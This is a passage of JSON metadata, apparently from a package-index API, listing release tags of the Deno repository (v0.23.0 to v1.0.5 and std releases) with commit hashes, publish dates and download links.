nd/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/